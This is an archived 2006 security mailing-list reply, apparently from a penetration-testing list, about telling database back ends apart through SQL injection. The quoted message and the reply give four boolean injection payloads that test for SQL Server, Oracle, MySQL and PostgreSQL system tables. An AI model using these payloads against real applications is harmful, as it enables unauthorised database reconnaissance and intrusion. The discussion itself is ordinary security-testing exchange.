RE: SQL injection (or not?)

From: Tonnerre Lombard (tonnerre.lombard@sygroup.ch)
Date: Thu Aug 10 2006 - 00:31:08 EDT

• Next message: Tonnerre Lombard: "Re: Wireless Cards for pen testing?"
• Previous message: Tim: "Re: Wireless Cards for pen testing?"
• In reply to: Isidro Ramon Labrador Rodriguez: "RE: SQL injection (or not?)"
• Next in thread: DokFLeed: "Re: SQL injection (or not?)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Salut,

On Wed, 2006-08-09 at 12:01 +0200, Isidro Ramon Labrador Rodriguez
wrote:
> Parameter=[valid value]' and exists(select * from sysobjects) and 'a'='a
>
> If it returns a valid value the database is SQL Server
>
>
> Parameter=[valid value]' and exists(select * from user_tables) and
> 'a'='a
>
> If it returns a valid value the database is Oracle
>
>
> Parameter=[valid value]' and exists(select * from mysql.user) and 'a'='a
>
>
> If it returns a valid value the database is MySQL

Parameter=[valid value]' and exists(select * from pg_shadow) and 'a'='a

should tell you it's PostgreSQL.

                                Tonnerre

-- 
SyGroup GmbH
Tonnerre Lombard
Loesungen mit System
Tel:+41 61 333 80 33    Roeschenzerstrasse 9
Fax:+41 61 383 14 67    4153 Reinach BL
Web:www.sygroup.ch      tonnerre.lombard@sygroup.ch

• application/pgp-signature attachment: This is a digitally signed message part

• Next message: Tonnerre Lombard: "Re: Wireless Cards for pen testing?"
• Previous message: Tim: "Re: Wireless Cards for pen testing?"
• In reply to: Isidro Ramon Labrador Rodriguez: "RE: SQL injection (or not?)"
• Next in thread: DokFLeed: "Re: SQL injection (or not?)"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:56:38 EDT